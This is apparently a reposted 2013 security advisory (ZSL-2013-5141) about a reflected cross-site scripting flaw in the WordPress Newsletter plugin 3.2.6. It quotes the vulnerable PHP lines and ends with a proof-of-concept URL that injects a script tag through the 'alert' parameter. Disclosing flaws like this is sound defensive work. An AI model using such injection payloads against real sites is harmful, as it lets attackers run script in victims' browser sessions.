Lucene search
K

Wordpress Newsletter 3.2.6 Cross Site Scripting

🗓️ 14 May 2013 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Wordpress Newsletter Plugin 3.2.6 (alert) Reflected XSS Vulnerability, Stefano Liss

Code
`  
Wordpress Newsletter Plugin 3.2.6 (alert) Reflected XSS Vulnerability  
  
  
Vendor: Stefano Lissa  
Product web page: http://wordpress.org/extend/plugins/newsletter/  
Affected version: 3.2.6 and bellow  
  
Summary: Newsletter is the perfect WordPress plugin for creating  
real newsletters and mail marketing system on your WordPress blog.  
  
Desc: The plugin suffers from a XSS issue due to a failure to properly  
sanitize user-supplied input to the 'alert' GET parameter in the 'page.php'  
script. Attackers can exploit this weakness to execute arbitrary HTML  
and script code in a user's browser session.  
  
  
=======================================================================  
/subscription/page.php:  
-----------------------  
  
70: <?php if (!empty($alert)) { ?>  
71: <script>  
72: alert("<?php echo addslashes($alert); ?>");  
73: </script>  
74: <?php } ?>  
  
=======================================================================  
  
  
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)  
Apache 2.4.2 (Win32)  
PHP 5.4.7  
MySQL 5.5.25a  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2013-5141  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5141.php  
  
  
09.05.2013  
  
--  
  
http://10.0.55.5/wordpress/wp-content/plugins/newsletter/subscription/page.php?alert=</script><script>alert(/ZSL/);</script>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation